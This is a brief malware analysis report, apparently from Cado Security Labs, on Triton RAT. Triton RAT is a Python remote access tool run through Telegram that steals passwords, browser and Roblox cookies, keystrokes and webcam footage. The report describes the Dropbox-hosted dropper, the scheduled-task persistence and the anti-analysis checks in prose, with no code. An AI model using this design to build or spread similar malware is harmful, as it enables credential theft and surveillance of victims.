Cado Security Labs has identified a Python-based Remote Access Tool (RAT) named Triton RAT. This open-source RAT is available on GitHub and enables users to remotely access and control a system using Telegram.
The Python script of the Triton RAT begins by retrieving the Telegram Bot token and chat ID from Pastebin. Triton RAT has a wide array of malicious capabilities, including:
KeyloggingRemote commandsStealing saved passwordsStealing Roblox security cookiesChanging wallpaperScreen recordingWebcam accessGathering Wi-Fi informationDownloading/uploading filesExecuting shell commandsStealing clipboard dataAnti-analysis techniquesGathering system informationAll exfiltrated data is sent to a Telegram Bot.
The TritonRAT code includes a βsendmessageβ function that decrypts and saves passwords from various locations, including AppData, Google Chrome, User Data, Local, and Local State. The RAT also targets Roblox security cookies (.ROBLOSECURITY) in multiple browsers, such as Opera, Chrome, Edge, Chromium, Firefox, and Brave. These cookies can be used to gain access to Roblox accounts, bypassing 2FA.
The Python script also creates a VBScript (βupdateagent.vbsβ) and a BAT script (βcheck.batβ), which are executed with PowerShell. The BAT script retrieves a binary named βProton Drive.exeβ from DropBox, stores it in a hidden folder, and executes it with admin privileges. Proton Drive is a PyInstaller compiled version of TritonRAT, likely used for persistence. To maintain persistence, three scheduled tasks are created to start on logon of any user.
Triton RAT incorporates anti-analysis techniques, including checking for βblacklistedβ processes associated with debugging and antivirus products. The exfiltrated data is sent to a Telegram bot, where the attacker can send commands to the infected machine.